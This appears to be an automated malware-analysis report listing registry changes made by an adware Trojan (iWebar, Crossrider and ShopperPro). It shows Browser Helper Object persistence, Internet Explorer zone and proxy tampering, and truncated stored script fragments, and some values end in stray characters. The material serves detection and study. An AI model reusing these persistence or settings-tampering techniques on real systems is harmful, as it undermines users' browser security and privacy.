Array(\b570350b4c3537da86ad86d9abce1efa\,\f314248907a029a7abed39a808f85656\,\d37736b7d645eb232a2d3df184c62a8e\,\31e0ec7625715df526aca58083928066\,\f3ec239e8b3bdb9916169c9b86167758\,\3d26d8a96c15f6b5051fc1bcc6eb423a\,\a1906d221a1288d7654b45567f8bff32\,\962d54ae002b192a23cf0d627ca4643a\,\7fbf8e3056a3430ef0719fe0f8d19697\,\822ff505677e6fd6c03d56a0880e33e3\,\2aa39872d4a88ff2ae002f096c29203d\,\572f005f484a69caaac5a94b9a83e6d3\,\74daee4476ee6458c0658d4b6dbb6a87\,\ad0a942562992749e3cd0605384861b8\,\ac60b3b1d4f816455add6568f706cfde\,\622ae9cb2ed611f18d29f9bd378015d3\,\5a3caf8664fb583eb14337a390fbf9d5\,\f044655565d3405631530e295af905e7\,\552256541adb25c7083a92fb932ca29c\,\7aee132926c59308120337f27f540c33\,\5a3657fcd8c76f0a33bbfadfeb0ffcc6\,\2e3cae9d2b4481ab48be80aa634fa1b5\,\2c50ded0cd98773e7ebd9a321cc5d5b2\,\a4c92188943cebf2403518031997ac3f\,\60161d6b14470fa91c2c64e389698c1d\,\df48f52e949ff6c44aa31609e5c4b97b\,\3255a3fb20b7144b933c646b3203077f\,Sz"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_stats_]
    "Expiration" = "1717268200"

    [HKCU\Software\iWebar\Db\Internal\monetization_plugin_notBundledArr_]
    "Expiration" = "1896127200"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_override_verticals]
    "Value" = "{}"

    [HKCU\Software\iWebar\Db\Internal\monitor.onBeforeNavigate]
    "Value" = "false"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\iWebar\Db\Internal\monitor.onRequest]
    "Value" = "false"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_196378]
    "Expiration" = "1409684195"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Crossrider\onRequest]
    "35510" = ""

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_stats_]
    "Value" = "{""bic"":""4252D7B4B8E54E2E95F19018ADCF24D9IE""

    [HKCU\Software\iWebar\background]
    "__onDocumentStart_script__" = ""
    "IsEnabled" = "1"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_534129]
    "Expiration" = "1409684195"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_376579]
    "Value" = "//Javascript Helper Functions\r\n\r\nfunction getZData() {\r\n\tvar zdata = appAPI.installer.getParams().uzid;\r\n\treturn zdata;\r\n}\r\n\r\nfunction parseZData() {\r\n\t\r\n\tvar date_obj = \\;\r\n\tvar unq = \\;\r\n\ttry {\r\n\t\tvar zdata = getZData();\r\n\r\n\t\t$.base64.is_unicode = false;\r\n\t\tvar jsonData = $.base64.decode(zdata);\r\n\r\n\t\tvar jsonObj = $.parseJSON(jsonData);\r\n\t\tif (jsonObj !== null) {\r\n\t\t\tdate_obj = jsonObj.data.date;\r\n\t\t\tunq = jsonObj.data.unq;\r\n\t\t}\r\n\t}\r\n\tcatch (err) {\r\n\t\t//In case there's an error - just catch it here, so we'll do things gracefully.\r\n\t}\r\n\t\r\n\tvar obj = new Object({});\r\n\tobj.pix = unq;\r\n\tobj.installDate = \\;\r\n\tobj.product = \\;\r\n\tobj.aff = \\;\r\n\tobj.full_aff = \\;\r\n\r\n\t//If we've got something in the date_obj, parse it to get the additional data...\r\n\tif (date_obj !== \\) {\r\n\t\ttry {\r\n\t\t\t//the install date is the first 3 characters\r\n\t\t\tobj.installDate = date_obj.substr(0,3);\r\Rz"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_last_report_errors]
    "Expiration" = "1717268211"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_lastUpdate]
    "Value" = "1401908200729"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_483924]
    "Expiration" = "1409684195"

    [HKCU\Software\iWebar\background]
    "__onDocumentStart_script_store__" = ""

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_353989]
    "Value" = "/*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license\n//@ sourceMappingURL=jquery-1.10.2.min.map\n*/\n(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f=\1.10.2\,d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[ -]?(?:\\d*\\.|)\\d (?:[eE][ -]?\\d |)/.source,T=/\\S /g,C=/^[\\s\\uFEFF\\xA0] |[\\s\\uFEFF\\xA0] $/g,N=/^(?:\\s*(<[\\w\\W] >)[^>]*|#([\\w-]*))$/,k=/^<(\\w )\\s*\\/?>(?:<\\/\\1>|)$/,E=/^[\\],:{}\\s]*$/,S=/(?:^|:|,)(?:\\s*\\[) /g,A=/\\\\(?:[\\\\\\\/bfnrt]|u[\\da-fA-F]{4})/g,j=/\[^\\\\\\\r\\n]*\|true|false|null|-?(?:\\d \\.|)\\d (?:[eE][ -]?\\d |)/g,D=/^-ms-/,L=/-([\\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||\load\===e.type||\complete\===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener(\DOMContentLoaded\,q,!1),e.removeEventListener(\load\,q,!1)3z"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_183015]
    "Value" = "/*\n\nCopyright (C) 2011 by Yehuda Katz\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \Software\), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \AS IS\, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WI5z"

    [HKCU\Software\iWebar\Db\Internal\Resources_meta]
    "Expiration" = "1896127200"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_loader_session_page_impression]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process iwebar.exe:3032 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "E4 83 93 4B E3 23 76 5B 90 C2 3A 6E FB A8 7B F7"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    The process Object Browser-bg.exe:3272 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "FB F4 DB 22 E6 02 10 17 6E 40 FE B1 74 AF 33 0E"

    The process GLJ15.tmp:3704 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
    "(Default)" = "&Properties,0,2"

    [HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
    "(Default)" = "Animation GIF Control"

    [HKCR\AniGIFPpg2.AniGIFPpg2]
    "(Default)" = "AniGIFPpg2 Class"

    [HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
    "(Default)" = "0"

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
    "(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
    "(Default)" = "%System%\AniGIF.ocx, 1"

    [HKCR\AniGIFCtrl.AniGIF\CLSID]
    "(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"

    [HKCR\AniGIFPpg.AniGIFPpg]
    "(Default)" = "AniGIFPpg Class"

    [HKCR\AniGIFPpg2.AniGIFPpg2.1]
    "(Default)" = "AniGIFPpg2 Class"

    [HKCR\AniGIFPpg.AniGIFPpg\CurVer]
    "(Default)" = "AniGIFPpg.AniGIFPpg.1"

    [HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
    "(Default)" = "IAniGIFEvents"

    [HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid]
    "(Default)" = "{00020420-0000-0000-C000-000000000046}"

    [HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
    "(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"

    [HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
    "(Default)" = "%System%\AniGIF.ocx"

    [HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
    "(Default)" = "2"

    [HKCR\AniGIFCtrl.AniGIF\CurVer]
    "(Default)" = "AniGIFCtrl.AniGIF"

    [HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
    "(Default)" = "AniGIFPpg2.AniGIFPpg2.1"

    [HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
    "(Default)" = "{00020420-0000-0000-C000-000000000046}"

    [HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
    "Version" = "1.5"

    [HKCR\AniGIFCtrl.AniGIF]
    "(Default)" = "Animation GIF Control"

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
    "(Default)" = "AniGIFCtrl.AniGIF"

    [HKCR\AniGIFPpg.AniGIFPpg.1]
    "(Default)" = "AniGIFPpg Class"

    [HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
    "Version" = "1.5"

    [HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
    "ThreadingModel" = "Apartment"

    [HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
    "(Default)" = "IAniGIF"

    [HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
    "(Default)" = "AniGIFPpg2 Class"

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
    "(Default)" = "1.5"

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
    "(Default)" = ""

    [HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
    "(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"

    [HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
    "(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

    [HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
    "(Default)" = "%System%\AniGIF.ocx"

    [HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
    "(Default)" = "AniGIFPpg Class"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "8E 8B C0 D7 84 0D 18 9E 77 34 BC D1 CE ED 65 4B"

    [HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
    "(Default)" = "%System%\AniGIF.ocx"

    [HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
    "(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

    [HKCR\AniGIFCtrl.AniGIF\Insertable]
    "(Default)" = ""

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
    "(Default)" = "131473"

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
    "(Default)" = "%System%\AniGIF.ocx"
    "ThreadingModel" = "Apartment"

    [HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
    "(Default)" = "%System%\"

    [HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
    "ThreadingModel" = "Apartment"

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
    "(Default)" = "Animation GIF Control"

    The Trojan deletes the following registry key(s):

    [HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]

    The process %original file name%.exe:220 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "0C DF DC 48 0C 32 39 E9 D2 51 C0 07 0A 2B C3 97"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    The process regsvr32.exe:2616 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
    "(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

    [HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
    "(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

    [HKCR\ShopperPro.ShopperProBHO\CurVer]
    "(Default)" = "ShopperPro.ShopperProBHO.1"

    [HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
    "(Default)" = "ShopperPro"

    [HKCR\AppID\ShopperPro.DLL]
    "AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

    [HKCR\ShopperPro.ShopperProBHO]
    "(Default)" = "Shopper Pro"

    [HKCR\ShopperPro.ShopperProBHO.1\CLSID]
    "(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

    [HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\FLAGS]
    "(Default)" = "0"

    [HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\ProgID]
    "(Default)" = "ShopperPro.ShopperProBHO.1"

    [HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
    "(Default)" = "Shopper Pro"

    [HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
    "Version" = "1.0"

    [HKCR\ShopperPro.ShopperProBHO\CLSID]
    "(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

    [HKCR\ShopperPro.ShopperProBHO.1]
    "(Default)" = "Shopper Pro"

    [HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\HELPDIR]
    "(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

    [HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0]
    "(Default)" = "ShopperPro 1.0 Type Library"

    [HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "6E 86 55 B9 B4 06 7B 45 04 65 D9 06 C5 A8 A4 07"

    [HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\VersionIndependentProgID]
    "(Default)" = "ShopperPro.ShopperProBHO"

    [HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
    "ThreadingModel" = "Apartment"

    [HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
    "(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

    [HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\TypeLib]
    "(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

    [HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}]
    "(Default)" = "IShopperProBHO"

    [HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid32]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
    "(Default)" = "ShopperProBHO"

    "NoExplorer" = "1"

    The Trojan deletes the following registry key(s):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]

    The process regsvr32.exe:3068 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\InprocServer32]
    "(Default)" = "%Program Files%\Object Browser\Object Browser-bho.dll"

    [HKCR\CrossriderApp0032850.BHO.1]
    "(Default)" = "CrossriderApp0032850"

    [HKCR\CrossriderApp0032850.Sandbox]
    "(Default)" = "CrossriderApp0032850.Sandbox"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\ProgID]
    "(Default)" = "CrossriderApp0032850.BHO.1"

    [HKCR\Interface\{55555555-5555-5555-5555-550355285550}\ProxyStubClsid32]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\Interface\{66666666-6666-6666-6666-660366286650}\ProxyStubClsid32]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CrossriderApp0032850.Sandbox\CurVer]
    "(Default)" = "CrossriderApp0032850.Sandbox"

    [HKCR\Interface\{66666666-6666-6666-6666-660366286650}\ProxyStubClsid]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\VersionIndependentProgID]
    "(Default)" = "CrossriderApp0032850.Sandbox"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}]
    "(Default)" = "Object Browser"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440344284450}"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\Implemented Categories]
    "(Default)" = ""

    [HKCR\TypeLib\{44444444-4444-4444-4444-440344284450}\1.0]
    "(Default)" = "CrossriderApp0032850 Type Library"

    [HKCR\Interface\{55555555-5555-5555-5555-550355285550}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440344284450}"

    [HKCR\TypeLib\{44444444-4444-4444-4444-440344284450}\1.0\0\win32]
    "(Default)" = "%Program Files%\Object Browser\Object Browser-bho.dll"

    [HKCR\CrossriderApp0032850.BHO\CurVer]
    "(Default)" = "CrossriderApp0032850"

    [HKCR\CrossriderApp0032850.BHO.1\CLSID]
    "(Default)" = "{11111111-1111-1111-1111-110311281150}"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\ProgID]
    "(Default)" = "CrossriderApp0032850.Sandbox.1"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\InprocServer32]
    "ThreadingModel" = "Apartment"

    [HKCR\Interface\{55555555-5555-5555-5555-550355285550}\TypeLib]
    "Version" = "1.0"

    [HKCR\CrossriderApp0032850.Sandbox.1]
    "(Default)" = "CrossriderApp0032850.Sandbox"

    [HKCR\CrossriderApp0032850.Sandbox\CLSID]
    "(Default)" = "{22222222-2222-2222-2222-220322282250}"

    [HKCR\TypeLib\{44444444-4444-4444-4444-440344284450}\1.0\HELPDIR]
    "(Default)" = "%Program Files%\Object Browser"

    [HKCR\Interface\{66666666-6666-6666-6666-660366286650}]
    "(Default)" = "ISandBox"

    [HKCR\TypeLib\{44444444-4444-4444-4444-440344284450}\1.0\FLAGS]
    "(Default)" = "0"

    [HKCR\Interface\{55555555-5555-5555-5555-550355285550}\ProxyStubClsid]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\Interface\{66666666-6666-6666-6666-660366286650}\TypeLib]
    "Version" = "1.0"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\InprocServer32]
    "ThreadingModel" = "Apartment"

    [HKCR\Interface\{66666666-6666-6666-6666-660366286650}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440344284450}"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440344284450}"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "17 B0 19 B3 41 66 AF DE 42 EB 06 91 66 DF 0A 92"

    [HKCR\CrossriderApp0032850.BHO\CLSID]
    "(Default)" = "{11111111-1111-1111-1111-110311281150}"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\InprocServer32]
    "(Default)" = "%Program Files%\Object Browser\Object Browser-bho.dll"

    [HKCR\Interface\{55555555-5555-5555-5555-550355285550}]
    "(Default)" = "ICrossriderBHO"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
    "(Default)" = ""

    [HKCR\CrossriderApp0032850.Sandbox.1\CLSID]
    "(Default)" = "{22222222-2222-2222-2222-220322282250}"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\VersionIndependentProgID]
    "(Default)" = "CrossriderApp0032850"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}]
    "(Default)" = "CrossriderApp0032850.Sandbox"

    [HKCR\CrossriderApp0032850.BHO]
    "(Default)" = "CrossriderApp0032850"

    It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311281150}]
    "(Default)" = "CrossriderApp0032850"

    "NoExplorer" = "1"

    The Trojan deletes the following registry key(s):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311281150}]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\VersionIndependentProgID]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\Programmable]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\ProgID]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\InprocServer32]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\ProgID]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\Programmable]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\TypeLib]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\TypeLib]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\Implemented Categories]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311281150}\VersionIndependentProgID]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322282250}\InprocServer32]

    The process regsvr32.exe:2176 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\VersionIndependentProgID]
    "(Default)" = "CrossriderApp0048292.Sandbox"

    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440444824492}"

    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}]
    "(Default)" = "CrossriderApp0048292.Sandbox"

    [HKCR\CrossriderApp0048292.Sandbox\CLSID]
    "(Default)" = "{22222222-2222-2222-2222-220422822292}"

    [HKCR\TypeLib\{44444444-4444-4444-4444-440444824492}\1.0\0\win32]
    "(Default)" = "%Program Files%\Sense\Sense-bho.dll"

    [HKCR\Interface\{66666666-6666-6666-6666-660466826692}\TypeLib]
    "Version" = "1.0"

    [HKCR\Interface\{66666666-6666-6666-6666-660466826692}\ProxyStubClsid32]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\Implemented Categories]
    "(Default)" = ""

    [HKCR\CrossriderApp0048292.Sandbox]
    "(Default)" = "CrossriderApp0048292.Sandbox"

    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\ProgID]
    "(Default)" = "CrossriderApp0048292.Sandbox.1"

    [HKCR\CrossriderApp0048292.Sandbox.1]
    "(Default)" = "CrossriderApp0048292.Sandbox"

    [HKCR\CrossriderApp0048292.BHO.1]
    "(Default)" = "CrossriderApp0048292"

    [HKCR\CrossriderApp0048292.BHO.1\CLSID]
    "(Default)" = "{11111111-1111-1111-1111-110411821192}"

    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\InprocServer32]
    "(Default)" = "%Program Files%\Sense\Sense-bho.dll"

    [HKCR\CrossriderApp0048292.BHO]
    "(Default)" = "CrossriderApp0048292"

    [HKCR\CrossriderApp0048292.BHO\CurVer]
    "(Default)" = "CrossriderApp0048292"

    [HKCR\Interface\{55555555-5555-5555-5555-550455825592}\ProxyStubClsid]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CrossriderApp0048292.Sandbox\CurVer]
    "(Default)" = "CrossriderApp0048292.Sandbox"

    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\InprocServer32]
    "ThreadingModel" = "Apartment"

    [HKCR\Interface\{55555555-5555-5555-5555-550455825592}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440444824492}"

